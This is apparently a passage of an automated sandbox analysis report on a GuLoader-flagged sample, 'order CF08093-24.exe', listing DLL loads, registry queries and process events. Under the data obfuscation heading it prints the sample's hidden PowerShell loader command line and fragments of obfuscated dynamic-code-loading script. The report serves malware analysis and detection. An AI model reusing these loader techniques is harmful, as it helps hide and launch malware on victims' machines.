              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: order CF08093-24.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: %]qm.Core.pdb source: powershell.exe, 00000002.00000002.3121960782.00000000083C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: re.pdb source: powershell.exe, 00000002.00000002.3121960782.00000000083C8000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000002.00000002.3123794249.000000000A6AE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Sortkor $Gmelinastrohatch $Wallful), (Caseine @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tettering = [AppDomain]::CurrentDomain.GetAssemblies()$global
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Spaltedefinitioner)), $Gujerat).DefineDynamicModule($Midnatssolens, $false).DefineType($Korsfarers, $Malemuit, [System.MulticastDelega
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\order CF08093-24.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25)
              Source: C:\Users\user\Desktop\order CF08093-24.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25)Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,10_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07490FC4 push es; iretd 2_2_07490FC7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_235F2806 push ecx; ret 6_2_235F2819
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044693D push ecx; ret 10_2_0044694D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DB84
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DBAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00451D54 push eax; ret 10_2_00451D61
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044B090 push eax; ret 11_2_0044B0A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044B090 push eax; ret 11_2_0044B0CC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00451D34 push eax; ret 11_2_00451D41
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00444E71 push ecx; ret 11_2_00444E81
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00414060 push eax; ret 12_2_00414074
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00414060 push eax; ret 12_2_0041409C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00414039 push ecx; ret 12_2_00414049
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004164EB push 0000006Ah; retf 12_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00416553 push 0000006Ah; retf 12_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00416555 push 0000006Ah; retf 12_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\order CF08093-24.exeJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_004047CB
              Source: C:\Users\user\Desktop\order CF08093-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
